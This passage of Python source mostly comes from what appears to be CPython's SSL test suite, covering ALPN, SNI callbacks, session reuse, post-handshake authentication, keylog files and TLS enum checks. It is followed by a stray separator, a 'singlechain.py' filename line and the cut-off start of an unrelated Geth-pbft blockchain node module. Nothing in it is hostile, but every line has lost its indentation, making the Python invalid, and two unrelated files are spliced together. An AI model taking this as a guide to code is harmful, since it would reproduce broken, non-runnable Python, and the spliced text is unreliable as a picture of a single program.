chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
# This member is assigned dynamically in `ssl.py`:
Checked_SSLMethod.PROTOCOL_SSLv23 = Checked_SSLMethod.PROTOCOL_TLS
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def setUpModule():
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
singlechain.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import threading
import json
from collections import defaultdict
from chain.const import IP_CONFIG, USERNAME, PASSWD
from chain.gethnode import GethNode
from chain.iplist import IPList
from chain.conf import generate_genesis, generate_leaf_genesis
class SingleChain(object):
"""
Data structure for a set of Geth-pbft clients for a single blockchain.
"""
def __init__(self, name: str, level: int, node_count: int, threshold: int,
blockchain_id: int, ip_list: IPList, username: str = USERNAME, password: str = PASSWD) -> None:
# Check if the input params are legal.
if node_count > ip_list.get_full_count():
raise ValueError("not enough IPs")
self.username = username
self.password = password
self.level = level
self.chain_id = name # chain id
self.node_count = node_count
self.threshold = threshold
self.blockchain_id = blockchain_id
self.ip_list = ip_list
self.nodes = []
self.ips = set()
self.if_set_number = False
self.if_set_level = False
self.if_set_id = False
self.is_terminal = False
self.config_file = None
self.accounts = []
self.map = defaultdict(dict) # map of {tag: {enode: node}}
def singlechain_start(self) -> None:
"""Start all containers for a single chain."""
threads = []
for index in range(self.node_count):
pbft_id = index
node_index = index + 1
tmp = GethNode(self.ip_list, pbft_id, node_index, self.blockchain_id, self.username)
self.ips.add(tmp.ip)
self.nodes.append(tmp)
# xq start a thread, target stand for a function that you want to run ,args stand for the parameters
t = threading.Thread(target=tmp.start)
t.start()
threads.append(t)
time.sleep(0.4)
for t in threads:
# xq threads must run the join function, because the resources of main thread is needed
t.join()
for index in range(self.node_count):
